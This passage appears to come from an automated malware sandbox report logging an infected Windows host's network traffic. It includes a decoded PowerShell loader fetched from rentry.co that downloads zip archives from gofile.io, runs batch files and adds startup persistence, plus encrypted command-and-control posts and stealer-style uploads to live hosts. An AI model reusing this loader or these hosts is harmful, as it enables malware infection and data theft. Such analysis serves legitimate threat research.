2024-07-24 17:56:52 UTC	1369	IN	Data Raw: 6d 41 62 63 42 57 72 49 73 50 56 79 72 4a 42 63 79 52 6f 57 6d 5a 6d 61 7a 6b 71 55 59 54 58 79 48 30 61 6a 77 62 4d 67 5a 50 53 35 73 71 33 78 47 37 78 41 52 53 5a 35 5a 49 77 35 65 6b 5a 35 47 52 35 71 44 6d 53 41 73 58 63 4c 31 66 4c 42 6f 34 4b 55 68 4c 6e 32 2f 44 57 71 2b 42 41 31 49 67 79 51 6d 48 31 65 78 71 68 74 69 30 36 74 6c 4d 42 78 52 31 39 6d 6b 76 47 44 41 76 55 67 65 4e 4a 4e 6b 66 70 59 68 44 42 6d 66 42 43 63 71 52 70 32 4f 53 6d 65 79 75 36 6b 73 4c 45 48 79 79 56 43 55 57 4c 43 39 4c 52 70 4e 68 79 31 4b 73 67 51 4a 62 49 49 35 47 68 35 79 30 4c 63 62 59 77 59 50 54 41 52 52 52 59 50 52 62 49 46 5a 6d 61 45 42 4e 6b 6d 66 4b 56 4b 32 48 42 46 41 6e 77 77 4c 56 6b 36 78 74 6b 4a 37 74 70 75 78 41 42 78 78 72 75 46 6f 68 45 44 59 36 42 Data Ascii: mAbcBWrIsPVyrJBcyRoWmZmazkqUYTXyH0ajwbMgZPS5sq3xG7xARSZ5ZIw5ekZ5GR5qDmSAsXcL1fLBo4KUhLn2/DWq+BA1IgyQmH1exqhti06tlMBxR19mkvGDAvUgeNJNkfpYhDBmfBCcqRp2OSmeyu6ksLEHyyVCUWLC9LRpNhy1KsgQJbII5Gh5y0LcbYwYPTARRRYPRbIFZmaEBNkmfKVK2HBFAnwwLVk6xtkJ7tpuxABxxruFohEDY6B
2024-07-24 17:56:52 UTC	1369	IN	Data Raw: 4b 55 61 65 4c 42 6c 30 6f 79 51 58 42 6c 36 5a 6b 6c 70 37 6a 6f 2f 74 43 42 78 46 2b 75 6c 41 69 47 7a 51 72 53 51 66 63 4b 73 64 48 34 74 78 44 63 69 44 44 4a 73 79 58 71 79 32 42 31 76 58 71 37 6b 31 4c 52 7a 6d 34 56 69 41 66 50 69 46 42 54 35 6c 6a 78 56 36 70 67 51 42 59 4b 73 45 42 31 5a 47 76 59 35 32 55 34 4b 7a 6f 51 68 6b 58 63 50 51 53 62 42 45 6d 61 42 77 48 73 32 54 4e 53 36 57 55 51 30 46 70 31 30 6a 41 6c 2b 77 31 33 70 76 74 70 65 70 41 42 68 6c 77 76 46 77 71 45 7a 45 6c 53 6b 43 56 61 73 31 52 72 59 49 4c 55 79 76 46 42 73 36 64 72 47 79 55 32 4b 4c 71 37 6c 6c 4c 52 7a 6d 45 58 79 77 57 4a 57 68 62 43 59 73 71 78 31 50 69 33 45 4e 4d 4c 63 63 49 78 4a 53 72 61 5a 57 55 36 61 2f 6d 51 67 49 61 63 4c 70 4f 4a 52 67 32 49 45 74 43 6d 57 Data Ascii: KUaeLBl0oyQXBl6Zklp7jo/tCBxF+ulAiGzQrSQfcKsdH4txDciDDJsyXqy2B1vXq7k1LRzm4ViAfPiFBT5ljxV6pgQBYKsEB1ZGvY52U4KzoQhkXcPQSbBEmaBwHs2TNS6WUQ0Fp10jAl+w13pvtpepABhlwvFwqEzElSkCVas1RrYILUyvFBs6drGyU2KLq7llLRzmEXywWJWhbCYsqx1Pi3ENMLccIxJSraZWU6a/mQgIacLpOJRg2IEtCmW
2024-07-24 17:56:52 UTC	1369	IN	Data Raw: 68 77 42 66 4c 64 77 61 79 35 4b 6b 61 4a 4b 54 34 71 7a 37 52 77 51 57 65 72 64 56 4b 78 34 79 49 6b 64 41 30 69 53 41 57 4c 72 45 57 78 34 45 32 52 6a 4b 32 37 4d 6a 68 39 6a 72 70 71 6b 5a 53 78 64 30 76 46 59 6f 45 54 4d 76 51 6b 36 41 59 38 56 52 6f 6f 41 49 55 53 48 4b 43 38 65 4a 71 6d 6d 57 6d 2b 47 6e 35 30 49 50 58 7a 66 30 57 7a 52 57 5a 6d 68 32 53 70 78 78 7a 31 69 7a 6a 6b 4e 42 61 64 64 49 77 4a 66 73 4e 64 36 63 34 72 6a 69 51 41 41 55 64 37 4e 54 4b 52 77 2b 4a 30 42 45 6e 47 48 42 58 4b 71 4a 44 6c 41 74 78 77 48 41 6c 36 68 71 33 74 61 73 72 66 45 42 55 31 39 53 6c 58 45 41 45 53 52 6f 57 77 6d 4c 4b 73 64 54 34 74 78 44 55 69 37 43 41 73 79 63 70 6d 4f 58 6c 75 65 34 2b 30 49 50 48 48 43 33 57 79 55 59 50 69 39 42 53 5a 56 72 79 31 75 Data Ascii: hwBfLdway5KkaJKT4qz7RwQWerdVKx4yIkdA0iSAWLrEWx4E2RjK27Mjh9jrpqkZSxd0vFYoETMvQk6AY8VRooAIUSHKC8eJqmmWm+Gn50IPXzf0WzRWZmh2Spxxz1izjkNBaddIwJfsNd6c4rjiQAAUd7NTKRw+J0BEnGHBXKqJDlAtxwHAl6hq3tasrfEBU19SlXEAESRoWwmLKsdT4txDUi7CAsycpmOXlue4+0IPHHC3WyUYPi9BSZVry1u
2024-07-24 17:56:52 UTC	1369	IN	Data Raw: 53 75 4f 55 49 65 61 70 32 65 52 6c 65 2b 73 36 6b 6f 4f 46 58 69 7a 56 43 45 45 50 53 64 4c 51 35 4a 6c 78 6c 6d 6a 69 77 56 5a 4c 73 38 41 77 4e 76 69 4c 5a 6d 41 72 50 4b 70 62 77 77 63 66 66 52 44 59 67 39 2b 4c 30 67 48 79 69 72 41 56 61 69 4f 44 56 34 67 33 41 37 4f 6d 36 39 2f 6e 5a 37 6b 72 4f 56 4e 42 68 64 77 74 46 6b 6e 47 7a 55 6c 51 6b 65 5a 61 34 41 52 34 6f 4d 62 48 6e 2b 4f 4f 63 71 56 71 47 4f 64 69 4f 76 71 39 67 38 53 58 33 36 34 48 48 52 57 4d 53 46 57 51 4a 64 69 79 56 2b 73 6a 51 70 5a 49 38 30 4a 77 35 65 6a 5a 4a 32 51 37 61 4c 6d 51 67 73 55 63 62 35 64 49 68 4e 2b 5a 67 52 41 69 69 71 59 48 34 32 48 42 6c 55 6d 6a 43 2f 42 6e 4b 41 74 67 64 62 31 36 75 35 4e 53 30 63 35 74 31 67 69 48 7a 45 73 54 6b 43 53 62 63 5a 66 71 6f 38 4f Data Ascii: SuOUIeap2eRle+s6koOFXizVCEEPSdLQ5JlxlmjiwVZLs8AwNviLZmArPKpbwwcffRDYg9+L0gHyirAVaiODV4g3A7Om69/nZ7krOVNBhdwtFknGzUlQkeZa4AR4oMbHn+OOcqVqGOdiOvq9g8SX364HHRWMSFWQJdiyV+sjQpZI80Jw5ejZJ2Q7aLmQgsUcb5dIhN+ZgRAiiqYH42HBlUmjC/BnKAtgdb16u5NS0c5t1giHzEsTkCSbcZfqo8O
2024-07-24 17:56:52 UTC	218	IN	Data Raw: 6a 56 32 2f 51 74 32 5a 76 2b 75 4f 39 43 48 52 77 2b 69 6d 49 43 45 54 67 74 51 31 66 51 52 4d 74 4c 70 63 52 4e 48 69 69 4f 55 50 37 62 35 43 32 68 31 71 79 79 71 52 6c 4c 4b 6e 71 36 55 69 73 41 4c 32 56 71 51 4a 52 76 78 30 2f 67 71 67 68 4b 49 49 35 47 68 35 33 73 4e 63 37 57 72 4b 37 34 41 56 4e 50 4b 2b 38 4a 66 30 46 75 65 6c 73 4a 69 79 72 57 48 2f 72 57 54 52 34 31 6a 6c 43 48 33 4b 39 2f 6a 4a 37 76 76 4f 6f 47 4e 53 46 36 6f 6c 45 6a 48 54 38 57 65 6d 6d 66 61 38 4e 52 34 4c 55 56 55 7a 66 4e 44 63 43 6c 6b 6d 4f 5a 6a 4f 75 6b 37 30 46 4c 55 54 6d 37 48 48 51 76 66 6d 41 45 65 4e 77 71 32 42 2f 36 78 44 5a 64 4b 63 41 50 30 59 0d 0a Data Ascii: jV2/Qt2Zv+uO9CHRw+imICETgtQ1fQRMtLpcRNHiiOUP7b5C2h1qyyqRlLKnq6UisAL2VqQJRvx0/gqghKII5Gh53sNc7WrK74AVNPK+8Jf0FuelsJiyrWH/rWTR41jlCH3K9/jJ7vvOoGNSF6olEjHT8Wemmfa8NR4LUVUzfNDcClkmOZjOuk70FLUTm7HHQvfmAEeNwq2B/6xDZdKcAP0Y
2024-07-24 17:56:52 UTC	1369	IN	Data Raw: 32 34 36 65 0d 0a 72 68 54 6f 69 56 34 36 48 6f 41 55 56 66 66 2f 51 45 66 46 68 2b 4c 46 55 48 79 6a 71 53 42 50 66 58 56 41 35 31 30 55 62 65 32 37 6f 74 78 73 71 69 36 76 73 42 55 31 38 2b 75 6c 45 74 46 54 41 72 56 6c 57 55 61 64 5a 63 35 62 6f 39 66 79 72 46 42 4d 71 55 70 31 4f 67 75 65 47 68 35 55 77 45 46 45 65 4b 53 53 38 59 4d 43 39 53 56 74 49 6b 67 46 44 69 33 44 6f 65 62 34 34 33 69 64 75 30 4c 63 62 59 32 61 6e 6e 54 77 77 4a 61 50 6c 39 49 52 30 79 4a 55 74 4d 30 69 53 41 57 65 4c 63 55 78 42 6e 79 68 6d 48 77 2f 77 2f 78 63 32 2f 2f 62 6b 54 46 46 46 67 39 45 70 73 54 6d 78 6d 42 46 58 53 4d 6f 41 59 6f 5a 59 52 57 43 54 59 43 34 43 6c 6b 6b 36 4a 6a 75 61 78 71 32 63 4d 44 6e 43 69 55 54 34 6f 41 41 5a 4a 52 70 46 6b 67 6d 36 30 69 52 4e Data Ascii: 246erhToiV46HoAUVff/QEfFh+LFUHyjqSBPfXVA510Ube27otxsqi6vsBU18+ulEtFTArVlWUadZc5bo9fyrFBMqUp1OgueGh5UwEFEeKSS8YMC9SVtIkgFDi3Doeb443idu0LcbY2annTwwJaPl9IR0yJUtM0iSAWeLcUxBnyhmHw/w/xc2//bkTFFFg9EpsTmxmBFXSMoAYoZYRWCTYC4Clkk6Jjuaxq2cMDnCiUT4oAAZJRpFkgm60iRN
2024-07-24 17:56:52 UTC	1369	IN	Data Raw: 35 4c 49 2b 7a 33 4d 68 36 4b 7a 71 56 64 4c 52 79 76 36 48 44 35 57 5a 6d 67 44 52 49 42 34 78 6c 79 30 68 30 52 67 47 65 67 4c 31 70 47 4e 59 49 36 66 30 70 54 38 51 67 55 52 66 71 4a 4e 62 46 68 2b 4a 77 51 66 71 79 71 49 45 36 53 48 46 52 34 59 67 45 6a 66 32 2f 51 74 71 35 76 69 70 4f 35 58 47 6c 4a 66 74 30 30 6d 4e 7a 4d 34 51 77 66 63 4b 73 59 66 2b 74 64 4e 48 69 50 66 53 4a 2f 4c 2f 6a 62 4c 79 37 76 36 75 31 35 46 42 6a 6d 69 48 48 52 45 63 47 68 57 42 38 6f 71 68 31 79 77 6c 67 56 64 4d 63 31 50 2b 61 57 5a 62 70 43 57 36 37 7a 63 51 68 6f 63 65 62 39 69 45 6a 63 77 49 30 4e 4c 68 46 54 2b 61 71 47 4b 44 56 6b 78 33 30 69 4a 32 36 4d 74 78 71 47 73 34 71 6c 2b 52 56 39 68 39 41 52 73 49 7a 30 6d 53 6b 43 45 65 34 31 71 6f 5a 55 41 58 69 79 4f Data Ascii: 5LI+z3Mh6KzqVdLRyv6HD5WZmgDRIB4xly0h0RgGegL1pGNYI6f0pT8QgURfqJNbFh+JwQfqyqIE6SHFR4YgEjf2/Qtq5vipO5XGlJft00mNzM4QwfcKsYf+tdNHiPfSJ/L/jbLy7v6u15FBjmiHHREcGhWB8oqh1ywlgVdMc1P+aWZbpCW67zcQhoceb9iEjcwI0NLhFT+aqGKDVkx30iJ26MtxqGs4ql+RV9h9ARsIz0mSkCEe41qoZUAXiyO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.10	49757	107.173.160.139	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:56:53 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-24 17:56:53 UTC	1267	OUT	Data Raw: 6b 78 64 75 34 57 2f 7a 56 6c 33 76 41 70 64 42 6a 42 72 46 58 79 73 56 77 7a 48 2b 39 59 36 57 46 59 54 4b 48 72 4f 35 66 38 55 70 51 70 51 41 43 6e 43 64 6e 65 36 33 68 55 6d 37 49 37 6e 58 65 42 7a 4d 6a 42 56 37 6e 53 63 68 2b 51 34 4f 35 6d 6b 55 45 50 39 32 2f 2f 61 38 69 66 53 31 7a 53 68 75 74 37 4b 38 4d 69 4e 39 36 68 4c 58 72 35 49 50 45 6d 44 46 45 68 79 33 77 38 6f 6d 71 5a 78 79 39 30 62 57 33 45 6b 39 51 59 56 6c 31 2f 36 63 34 61 63 4a 6a 67 50 61 38 6e 46 38 53 2b 7a 6c 4c 4d 74 68 50 55 69 6a 5a 34 4a 51 52 57 68 52 6f 4b 6c 68 6e 52 79 39 76 45 57 77 31 4a 77 47 77 45 47 6e 59 57 68 2f 50 43 4d 77 53 61 53 49 35 4a 4c 59 70 68 6e 4e 57 46 34 74 6a 53 61 4f 6c 2f 45 6f 64 70 74 64 31 4e 41 48 6d 6a 4e 72 4c 30 54 64 74 66 75 32 4b 4b 4d Data Ascii: kxdu4W/zVl3vApdBjBrFXysVwzH+9Y6WFYTKHrO5f8UpQpQACnCdne63hUm7I7nXeBzMjBV7nSch+Q4O5mkUEP92//a8ifS1zShut7K8MiN96hLXr5IPEmDFEhy3w8omqZxy90bW3Ek9QYVl1/6c4acJjgPa8nF8S+zlLMthPUijZ4JQRWhRoKlhnRy9vEWw1JwGwEGnYWh/PCMwSaSI5JLYphnNWF4tjSaOl/Eodptd1NAHmjNrL0Tdtfu2KKM
2024-07-24 17:56:54 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:56:54 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:56:54 UTC	685	IN	Data Raw: 67 50 4f 6a 4e 50 49 6f 58 6d 33 62 4f 4e 2f 4f 72 2b 49 47 72 73 6b 6e 4d 4f 4e 30 46 62 5a 59 4c 53 54 67 62 46 34 61 68 79 56 4d 69 4b 65 4e 75 55 4a 74 58 36 62 65 6f 43 4f 4c 37 4b 38 5a 56 6c 69 49 5a 6a 75 54 6e 64 77 5a 6b 67 4d 76 68 42 5a 45 33 6e 78 46 30 6d 2f 5a 6f 55 54 6f 4a 50 69 50 67 6c 49 62 6e 34 73 69 32 78 33 30 4a 30 6a 51 4c 74 69 2f 42 6c 53 4a 58 69 30 56 56 43 4c 4b 58 56 73 39 6b 35 48 77 72 5a 34 43 72 34 71 2b 71 64 74 4b 78 58 44 69 6d 4c 79 33 67 37 61 43 47 55 5a 65 44 6b 54 6d 43 76 4a 7a 32 50 47 71 44 58 48 49 4a 34 68 65 35 2f 42 51 38 31 7a 77 76 32 63 49 41 63 44 56 4e 58 6a 73 59 49 4f 69 4b 7a 65 6f 39 4f 5a 41 4f 69 67 7a 51 31 46 4b 6b 79 44 75 51 76 2f 2b 6e 69 66 31 35 2f 4f 50 73 4b 52 33 69 4e 66 33 48 6a 59 Data Ascii: gPOjNPIoXm3bON/Or+IGrsknMON0FbZYLSTgbF4ahyVMiKeNuUJtX6beoCOL7K8ZVliIZjuTndwZkgMvhBZE3nxF0m/ZoUToJPiPglIbn4si2x30J0jQLti/BlSJXi0VVCLKXVs9k5HwrZ4Cr4q+qdtKxXDimLy3g7aCGUZeDkTmCvJz2PGqDXHIJ4he5/BQ81zwv2cIAcDVNXjsYIOiKzeo9OZAOigzQ1FKkyDuQv/+nif15/OPsKR3iNf3HjY

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.10	49759	104.26.3.16	443	4688	C:\Users\user\AppData\Local\Temp\753F.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:56:53 UTC	167	OUT	GET /microgods/raw HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-CH) WindowsPowerShell/5.1.19041.1682 Host: rentry.co Connection: Keep-Alive
2024-07-24 17:56:53 UTC	694	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 17:56:53 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2509 Connection: close vary: Origin x-xss-protection: 1; mode=block x-content-type-options: nosniff strict-transport-security: max-age=31536000; includeSubDomains Cache-Control: Vary CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ezeHwzl32uPxBUZ6unmlnyznLjUvmUYvEzCtrvtu8PCKnIFBzRc1pAxhu8BRpCcwLlOUpCcW5vjeSOW8m6zjOjr4r7iFcSyEyFhRE9EeMKKoUf%2BNXL19utpLxA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a85ca19fc167c94-EWR
2024-07-24 17:56:53 UTC	675	IN	Data Raw: 24 75 72 6c 31 20 3d 20 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 34 2e 67 6f 66 69 6c 65 2e 69 6f 2f 64 6f 77 6e 6c 6f 61 64 2f 64 69 72 65 63 74 2f 36 62 32 34 65 63 39 37 2d 32 61 38 64 2d 34 36 38 64 2d 61 32 34 64 2d 63 38 30 38 31 63 64 61 31 64 61 62 2f 76 6d 2e 7a 69 70 22 0d 0a 24 75 72 6c 32 20 3d 20 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 34 2e 67 6f 66 69 6c 65 2e 69 6f 2f 64 6f 77 6e 6c 6f 61 64 2f 64 69 72 65 63 74 2f 30 36 35 36 63 35 63 66 2d 35 31 62 34 2d 34 66 61 34 2d 61 65 34 38 2d 38 65 65 35 65 64 33 64 31 34 32 65 2f 6c 6d 2e 7a 69 70 22 0d 0a 24 74 65 6d 70 44 69 72 31 20 3d 20 5b 53 79 73 74 65 6d 2e 49 4f 2e 50 61 74 68 5d 3a 3a 43 6f 6d 62 69 6e 65 28 24 65 6e 76 3a 54 45 4d 50 2c 20 22 45 78 74 72 61 63 74 65 64 56 65 6e 6f Data Ascii: $url1 = "https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip"$url2 = "https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip"$tempDir1 = [System.IO.Path]::Combine($env:TEMP, "ExtractedVeno
2024-07-24 17:56:53 UTC	1369	IN	Data Raw: 72 79 0d 0a 20 20 20 20 29 0d 0a 20 20 20 20 24 62 61 74 46 69 6c 65 73 20 3d 20 47 65 74 2d 43 68 69 6c 64 49 74 65 6d 20 2d 50 61 74 68 20 24 64 69 72 65 63 74 6f 72 79 20 2d 46 69 6c 74 65 72 20 2a 2e 62 61 74 20 2d 46 69 6c 65 0d 0a 20 20 20 20 66 6f 72 65 61 63 68 20 28 24 62 61 74 46 69 6c 65 20 69 6e 20 24 62 61 74 46 69 6c 65 73 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 2d 46 69 6c 65 50 61 74 68 20 22 63 6d 64 2e 65 78 65 22 20 2d 41 72 67 75 6d 65 6e 74 4c 69 73 74 20 22 2f 63 20 24 28 24 62 61 74 46 69 6c 65 2e 46 75 6c 6c 4e 61 6d 65 29 22 20 2d 57 6f 72 6b 69 6e 67 44 69 72 65 63 74 6f 72 79 20 24 64 69 72 65 63 74 6f 72 79 20 2d 4e 6f 4e 65 77 57 69 6e 64 6f 77 0d 0a 20 20 20 20 7d 0d 0a 7d 0d 0a 0d 0a Data Ascii: ry ) $batFiles = Get-ChildItem -Path $directory -Filter *.bat -File foreach ($batFile in $batFiles) { Start-Process -FilePath "cmd.exe" -ArgumentList "/c $($batFile.FullName)" -WorkingDirectory $directory -NoNewWindow }}
2024-07-24 17:56:53 UTC	465	IN	Data Raw: 69 72 32 2e 43 6f 75 6e 74 20 2d 67 74 20 30 29 20 7b 0d 0a 20 20 20 20 52 75 6e 2d 42 61 74 46 69 6c 65 73 20 2d 64 69 72 65 63 74 6f 72 79 20 24 74 65 6d 70 44 69 72 31 0d 0a 20 20 20 20 52 75 6e 2d 42 61 74 46 69 6c 65 73 20 2d 64 69 72 65 63 74 6f 72 79 20 24 74 65 6d 70 44 69 72 32 0d 0a 0d 0a 20 20 20 20 24 62 61 74 46 69 6c 65 31 20 3d 20 47 65 74 2d 43 68 69 6c 64 49 74 65 6d 20 2d 50 61 74 68 20 24 74 65 6d 70 44 69 72 31 20 2d 46 69 6c 74 65 72 20 2a 2e 62 61 74 20 2d 46 69 6c 65 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 46 69 72 73 74 20 31 0d 0a 20 20 20 20 69 66 20 28 24 62 61 74 46 69 6c 65 31 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 41 64 64 2d 56 62 73 54 6f 53 74 61 72 74 75 70 20 2d 62 61 74 46 69 6c 65 50 61 74 68 20 24 62 61 Data Ascii: ir2.Count -gt 0) { Run-BatFiles -directory $tempDir1 Run-BatFiles -directory $tempDir2 $batFile1 = Get-ChildItem -Path $tempDir1 -Filter *.bat -File \| Select-Object -First 1 if ($batFile1) { Add-VbsToStartup -batFilePath $ba

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.10	49760	188.114.96.3	443	4216	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:56:54 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12842 Host: callosallsaospz.shop
2024-07-24 17:56:54 UTC	12842	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 32 43 31 31 34 37 36 39 45 35 39 41 33 36 30 44 33 46 41 41 41 31 42 35 30 38 44 46 37 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8F2C114769E59A360D3FAAA1B508DF78--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
2024-07-24 17:56:54 UTC	808	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 17:56:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4s6330b9tj30jr2eutm88k8hv1; expires=Sun, 17-Nov-2024 11:43:33 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HOzQ9o44k4GverMCDPoC%2B39C5AcjcLhBZQwAz3mWa8k3jmAbe0e61v9fbQQckJ7ZiI1jzfy9XHOClTwzt%2FQflrRvzl9Tk6fPzaZTmh%2BmYKvLG6bc1544Y7t5WZYpTIEHnuXNmdb31Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a85ca1f5d5a8ccc-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 17:56:54 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-24 17:56:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.10	49761	167.235.128.153	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:56:55 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:56:55 UTC	1122	OUT	Data Raw: 4a 68 54 6f 49 50 58 54 72 64 31 57 44 44 51 68 4d 47 6c 56 44 77 45 53 72 33 32 62 7a 6c 58 78 78 4a 66 58 45 59 38 74 76 66 48 41 6f 57 4f 56 64 30 6b 72 6a 47 39 38 35 65 35 56 45 30 48 65 68 47 51 67 48 73 57 6c 77 68 7a 49 45 47 45 78 67 62 48 69 53 72 6e 49 4b 48 6f 32 62 70 4d 61 59 6d 2f 70 44 54 57 6f 59 52 35 7a 75 65 4a 33 70 59 53 6a 58 36 74 42 46 61 65 42 75 54 6c 51 70 58 75 66 39 35 55 30 72 43 45 72 61 34 4e 4e 4b 6f 58 34 69 37 46 49 4e 57 4b 6f 65 79 77 4f 63 73 74 50 58 45 77 52 6a 7a 2b 52 51 48 38 78 4c 4c 32 58 31 6b 39 39 45 38 6f 58 63 34 68 4d 6b 79 75 58 48 7a 79 75 55 63 77 74 55 78 56 64 73 46 6c 73 54 62 79 2f 77 6e 52 59 59 55 6d 2f 41 57 47 73 54 30 51 4b 71 6c 69 5a 41 32 58 79 61 33 7a 61 4b 61 4e 5a 69 4c 38 41 7a 6e 36 Data Ascii: JhToIPXTrd1WDDQhMGlVDwESr32bzlXxxJfXEY8tvfHAoWOVd0krjG985e5VE0HehGQgHsWlwhzIEGExgbHiSrnIKHo2bpMaYm/pDTWoYR5zueJ3pYSjX6tBFaeBuTlQpXuf95U0rCEra4NNKoX4i7FINWKoeywOcstPXEwRjz+RQH8xLL2X1k99E8oXc4hMkyuXHzyuUcwtUxVdsFlsTby/wnRYYUm/AWGsT0QKqliZA2Xya3zaKaNZiL8Azn6
2024-07-24 17:56:56 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:56:55 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:56:56 UTC	685	IN	Data Raw: 44 30 7a 64 70 47 6b 79 59 47 68 58 58 61 33 62 4e 34 73 58 4f 4c 37 56 31 44 64 4e 68 58 55 37 48 76 4a 64 68 57 4c 2b 52 2f 45 72 35 4f 6a 32 5a 6d 48 77 72 33 4c 42 77 37 34 68 34 63 36 49 73 55 32 76 72 7a 74 48 68 55 32 7a 30 4f 76 43 59 6f 73 69 69 49 69 32 4d 47 4a 2f 76 66 4b 4d 4c 64 61 4f 4b 51 57 69 71 78 49 37 35 4f 46 4d 56 62 47 6a 32 42 34 6f 62 69 67 61 6c 69 6a 2b 67 36 61 56 4c 78 73 6f 4e 4f 56 56 4b 62 61 54 74 49 66 4d 59 42 72 77 31 66 34 61 68 63 64 4c 58 43 58 52 52 61 76 2b 30 51 6d 72 52 30 63 39 6f 6b 76 72 69 47 72 6d 2f 42 52 34 4b 36 6e 36 59 53 6b 53 55 71 70 30 57 31 36 6a 56 2f 6d 6e 6e 73 34 61 57 4c 30 73 41 4a 53 47 67 4f 72 6a 39 46 49 61 76 64 72 59 34 68 32 6f 50 56 77 75 76 4f 79 51 53 68 69 63 46 7a 6a 75 75 63 53 Data Ascii: D0zdpGkyYGhXXa3bN4sXOL7V1DdNhXU7HvJdhWL+R/Er5Oj2ZmHwr3LBw74h4c6IsU2vrztHhU2z0OvCYosiiIi2MGJ/vfKMLdaOKQWiqxI75OFMVbGj2B4obigalij+g6aVLxsoNOVVKbaTtIfMYBrw1f4ahcdLXCXRRav+0QmrR0c9okvriGrm/BR4K6n6YSkSUqp0W16jV/mnns4aWL0sAJSGgOrj9FIavdrY4h2oPVwuvOyQShicFzjuucS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.10	49762	188.114.96.3	443	4216	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:56:56 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15069 Host: callosallsaospz.shop
